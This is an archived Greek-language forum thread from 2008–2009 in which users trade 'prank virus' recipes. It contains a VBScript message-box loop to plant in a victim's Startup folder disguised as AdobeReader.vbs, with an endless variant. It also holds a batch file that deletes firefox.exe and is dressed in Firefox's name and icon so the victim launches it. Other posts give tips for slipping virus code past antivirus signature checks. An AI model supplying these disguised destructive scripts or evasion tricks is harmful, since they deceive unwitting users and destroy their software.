vermilion Δημοσ. 20 Ιουλίου 2008 Δημοσ. 20 Ιουλίου 2008 λαθος το πανο πιτε και αλλα. Εχω μια ερωτιση γήνετε να σπασω το κωδικό που εχω βαλι στο pc μου για να ανιγι γτ τον κσεχασα και δεν μπορο να μπο πιτε μου πως τον σπας PLZ
poscaman Δημοσ. 20 Ιουλίου 2008 Δημοσ. 20 Ιουλίου 2008 ζητας ευγενικα απο τον ιδιοκτητη,και κατοχο του κωδικου να σουν τον εισαγει.διαφορετικα,τι να σου πουμε κι εμεις εδω.. εγκω παντως ανιγι καπακι μπειρας μαι τω μπρωστεινο δωντη
vermilion Δημοσ. 21 Ιουλίου 2008 Δημοσ. 21 Ιουλίου 2008 πρόβλημα το pc είναι δικό μου και έχω ξεχάσει τον κωδικό μου μιπος γίνετε να τον σπάσω γτ παίζω από τον παλιό μου υπολογιστή και είναι για τον πουτ..
Red_Phantom Δημοσ. 21 Ιουλίου 2008 Δημοσ. 21 Ιουλίου 2008 http://www.milw0rm.com/video/watch.php?id=77 Μάλλον άμα βάλεις το signature σε εναν char[] θα αναγνωρίζεται σαν ιος.
FarCry Δημοσ. 21 Ιουλίου 2008 Δημοσ. 21 Ιουλίου 2008 http://www.milw0rm.com/video/watch.php?id=77 Μάλλον άμα βάλεις το signature σε εναν char[] θα αναγνωρίζεται σαν ιος. λεει για το clamwin που ειναι gtp. σε σοβαρα AV παιζει η μεθοδος αυτη? avira, kaspersky, nod32?
Red_Phantom Δημοσ. 22 Ιουλίου 2008 Δημοσ. 22 Ιουλίου 2008 λεει για το clamwin που ειναι gtp. σε σοβαρα AV παιζει η μεθοδος αυτη? avira, kaspersky, nod32? Αν το AV ψάχνει μόνο για signature δεν βλέπω τον λόγο να μην δουλεύει. Αν και πάλι δεν ψάχνει μονο το signature, υπάρχουν και μέθοδοι για να αλλάξεις τον κώδικα του virus. Πχ mov ax,0 <====> xor ax,ax κτλ. Μετά απο αρκετές αλλαγές μάλλον δεν θα αναγνωρίζεται απο κανένα.
micos000 Δημοσ. 29 Οκτωβρίου 2008 Δημοσ. 29 Οκτωβρίου 2008 Διάβασα τυχαία αυτό το thread και μ' άρεσε. Να προσφέρω λοιπόν κι εγώ τον οβολό μου στο καθήκον και υποχρέωση του καθενός να κάνει δύσκολη την ζωή των φίλων του προκειμένου να γελάσει. Κάντε ένα αρχείο κειμένου. Βάλτε μέσα το παρακάτω IntCtr=1 MsgBox "Μπορώ να μετράω..." MsgBox "Με πάτησες " & intCtr & " φορά..." Do intCtr = intCtr + 1 ' Modify loop control variable MsgBox "Με πάτησες " & intCtr & " φορές..." ' Compare to upper limit If intCtr = 10 Then Exit Do Loop MsgBox "Αμάν, με ξέσκισες..." Σώστε και αλλάξτε το όνομα σε ότι θέλετε και την κατάληξη σε .vbs (άντε πάλι με τα scripts). Παράδειγμα AdobeReader.vbs Βάλτε στην Εκκίνηση, δώστε στην εκτέλεση το παρακάτω %ALLUSERSPROFILE%\Start Menu\Προγράμματα\Εκκίνηση και μεταφέρετε το αρχείο εκείή βάλτε το χύμα στον δίσκο C: και βάλτε το να τρέχει μέσω κλειδιού στο run (ο τρόπος αναφέρθηκε σε προηγούμενο post) ή απλά βάλτε το να τρέχει με κάποια συντόμευση παιχνιδιού. Όπως θέλετε. Έτσι όπως είναι τώρα τρέχει 10 φορές και σταματάει. Μπορείτε να αλλάξετε το 10 στο τέλος σε ότι νούμερο θέλετε. Αν θέλετε να είναι αιώνια η κατάσταση αλλάξτε το με το παρακάτω IntCtr=1 MsgBox "Μπορώ να μετράω πόσες φορές με πάτησες..." MsgBox "Με πάτησες " & intCtr & " φορά..." Do intCtr = intCtr + 1 ' Modify loop control variable MsgBox "Με πάτησες " & intCtr & " φορές..." Loop Αυτό θα επαναλαμβάνεται για πάντα και δεν υπάρχει τρόπος να το σταματήσει κανείς, εκτός αν το αφαιρέσει από την εκκίνηση.Απλά καθίστε και γελάστε, βλέποντάς τον να προσπαθεί να το σταματήσει. Δείτε μέχρι που θα φτάσει ο μετρητής πριν απηυδήσει και κάνει reset.
FarCry Δημοσ. 30 Οκτωβρίου 2008 Δημοσ. 30 Οκτωβρίου 2008 Διάβασα τυχαία αυτό το thread και μ' άρεσε.Να προσφέρω λοιπόν κι εγώ τον οβολό μου στο καθήκον και υποχρέωση του καθενός να κάνει δύσκολη την ζωή των φίλων του προκειμένου να γελάσει. Κάντε ένα αρχείο κειμένου. Βάλτε μέσα το παρακάτω Σώστε και αλλάξτε το όνομα σε ότι θέλετε και την κατάληξη σε .vbs (άντε πάλι με τα scripts). Παράδειγμα AdobeReader.vbs Βάλτε στην Εκκίνηση, δώστε στην εκτέλεση το παρακάτω και μεταφέρετε το αρχείο εκεί ή βάλτε το χύμα στον δίσκο C: και βάλτε το να τρέχει μέσω κλειδιού στο run (ο τρόπος αναφέρθηκε σε προηγούμενο post) ή απλά βάλτε το να τρέχει με κάποια συντόμευση παιχνιδιού. Όπως θέλετε. Έτσι όπως είναι τώρα τρέχει 10 φορές και σταματάει. Μπορείτε να αλλάξετε το 10 στο τέλος σε ότι νούμερο θέλετε. Αν θέλετε να είναι αιώνια η κατάσταση αλλάξτε το με το παρακάτω Αυτό θα επαναλαμβάνεται για πάντα και δεν υπάρχει τρόπος να το σταματήσει κανείς, εκτός αν το αφαιρέσει από την εκκίνηση. Απλά καθίστε και γελάστε, βλέποντάς τον να προσπαθεί να το σταματήσει. Δείτε μέχρι που θα φτάσει ο μετρητής πριν απηυδήσει και κάνει reset. βασικά κρατάει πατημένο το escape ka τρέχει πολύ γρήγορα και ούτε κουράζεται είναι γνωστό κόλπο σε dialog boxes και σε σπαστικές σελίδες
Spyrot Δημοσ. 7 Ιανουαρίου 2009 Δημοσ. 7 Ιανουαρίου 2009 1.ανοιξτε ενα notepad 2.γραψτε: @echo off del C:\\Program Files\Mozilla Firefox\firefox.exe 3.Σωστε το αρχειο σαν Mozilla Firefox.bat στην επιφανεια εργασιας. 4.Αλλαξτε το εικονιδιο του νεου αρχειου σε αυτο του Mozilla Firefox. 5.Τρεξτε το αρχειο. To παραπανω μπορει να γινει με αλλο προγραμμα,το μονο που ισως χρειαστει ειναι μια επανεγκατασταση του προγραμματος.(Φυσικα διαγραψτε την default συντομευση του ταδε προγραμματος.) 1.ανοιξτε το notepad 2.γραψτε: @echo off :start color 02 echo %random%%random%%random%%random%%random% % goto start 3.Σωστε σαν οτηδηποτε..bat (σε καποιους ισως φανει λιγο noobαδικο,συγχωρεστε με)
BanOr Δημοσ. 8 Ιανουαρίου 2009 Δημοσ. 8 Ιανουαρίου 2009 χα0χα00χα. το 90% το δοκιμασα...μένει τωρα να το κάνω σε αλλο άτομο :Ρ Το καλυτερο ήταν αυτο με το φορματ.χ0αχ0
FarCry Δημοσ. 15 Ιανουαρίου 2009 Δημοσ. 15 Ιανουαρίου 2009 1.ανοιξτε ενα notepad2.γραψτε: @echo off del C:\\Program Files\Mozilla Firefox\firefox.exe 3.Σωστε το αρχειο σαν Mozilla Firefox.bat στην επιφανεια εργασιας. 4.Αλλαξτε το εικονιδιο του νεου αρχειου σε αυτο του Mozilla Firefox. 5.Τρεξτε το αρχειο. To παραπανω μπορει να γινει με αλλο προγραμμα,το μονο που ισως χρειαστει ειναι μια επανεγκατασταση του προγραμματος.(Φυσικα διαγραψτε την default συντομευση του ταδε προγραμματος.) 1.ανοιξτε το notepad 2.γραψτε: @echo off :start color 02 echo %random%%random%%random%%random%%random% % goto start 3.Σωστε σαν οτηδηποτε..bat (σε καποιους ισως φανει λιγο noobαδικο,συγχωρεστε με) όλα αυτά δεν παίζουν αν ο άλλος δεν κρύβει τις καταλήξεις για γνωστούς τύπους αρχείων. γιατί θα διαπιστώσει ότι αντί για .exe έχει .bat
Spyrot Δημοσ. 16 Ιανουαρίου 2009 Δημοσ. 16 Ιανουαρίου 2009 Νομιζω πως τα shortcuts δεν φαινονται οι καταληξεις τους.:rolleyes: παρεμπιπτντος το 2ο που περιεγραψα δεν ειναι virus ειναι απλα κατι διασκεδαστικο εγω τουλαχιστον ετσι νομιζω.
FarCry Δημοσ. 16 Ιανουαρίου 2009 Δημοσ. 16 Ιανουαρίου 2009 Νομιζω πως τα shortcuts δεν φαινονται οι καταληξεις τους.:rolleyes: δεν ανέφερες για shortcuts. αυτά φαίνονται από το αριστερό βέλος. πρέπει να χρησιμοποιήσεις τρίτο πρόγραμμα για να αφαιρέσεις το βελάκι
Προτεινόμενες αναρτήσεις
Αρχειοθετημένο
Αυτό το θέμα έχει αρχειοθετηθεί και είναι κλειστό για περαιτέρω απαντήσεις.